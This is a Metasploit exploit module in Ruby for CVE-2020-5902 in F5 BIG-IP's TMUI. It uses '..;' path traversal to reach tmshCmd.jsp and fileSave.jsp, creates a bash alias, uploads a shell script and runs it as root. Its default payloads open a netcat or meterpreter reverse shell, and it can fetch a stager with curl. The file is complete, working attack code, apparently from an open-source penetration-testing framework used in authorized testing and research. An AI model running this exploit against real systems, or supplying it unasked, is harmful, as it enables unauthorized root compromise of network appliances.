modules/exploits/linux/http/f5_bigip_tmui_rce.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'F5 BIG-IP TMUI Directory Traversal and File Upload RCE',
        'Description' => %q{
          This module exploits a directory traversal in F5's BIG-IP Traffic
          Management User Interface (TMUI) to upload a shell script and execute
          it as the root user.
        },
        'Author' => [
          'wvu' # Analysis and exploit
        ],
        'References' => [
          ['CVE', '2020-5902'],
          ['URL', 'https://support.f5.com/csp/article/K52145254']
          # PoC courtesy of F5's advisory above: <LocationMatch ".*\.\.;.*">
        ],
        'DisclosureDate' => '2020-06-30', # Vendor advisory
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            'Platform' => 'unix',
            'Arch' => ARCH_CMD,
            'Type' => :unix_cmd,
            'DefaultOptions' => {
              'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
            }
          ],
          [
            'Linux Dropper',
            'Platform' => 'linux',
            'Arch' => [ARCH_X86, ARCH_X64],
            'Type' => :linux_dropper,
            'DefaultOptions' => {
              'CMDSTAGER::FLAVOR' => :curl,
              'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'SSL' => true,
          'AutoCheck' => false # TODO: Remove this once check is implemented!
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [FIRST_ATTEMPT_FAIL], # Seems a little finicky atm
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      Opt::RPORT(443),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])

    register_advanced_options([
      OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
    ])

    # XXX: https://github.com/rapid7/metasploit-framework/issues/12963
    import_target_defaults
  end

  def check
    CheckCode::Unsupported('I need to implement this!')
  end

  def exploit
    create_alias

    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  ensure
    delete_alias
  end

  def create_alias
    print_status('Creating alias list=bash')

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp',
      'vars_post' => {
        'command' => 'create cli alias private list command bash'
      }
    )

    unless res && res.code == 200 && res.get_json_document['error'].blank?
      fail_with(Failure::UnexpectedReply, 'Failed to create alias list=bash')
    end

    print_good('Successfully created alias list=bash')
  end

  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}")

    upload_script(cmd)
    execute_script
  end

  def upload_script(cmd)
    print_status("Uploading #{script_path}")

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => '/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp',
      'vars_post' => {
        'fileName' => script_path,
        'content' => cmd
      }
    )

    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, "Failed to upload #{script_path}")
    end

    register_file_for_cleanup(script_path)

    print_good("Successfully uploaded #{script_path}")
  end

  def execute_script
    print_status("Executing #{script_path}")

    send_request_cgi({
      'method' => 'POST',
      'uri' => '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp',
      'vars_post' => {
        'command' => "list #{script_path}"
      }
    }, 0)
  end

  def delete_alias
    print_status('Deleting alias list=bash')

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp',
      'vars_post' => {
        'command' => 'delete cli alias private list'
      }
    )

    unless res && res.code == 200 && res.get_json_document['error'].blank?
      print_warning('Failed to delete alias list=bash')
      return
    end

    print_good('Successfully deleted alias list=bash')
  end

  def script_path
    @script_path ||=
      normalize_uri(datastore['WritableDir'], rand_text_alphanumeric(8..42))
  end

end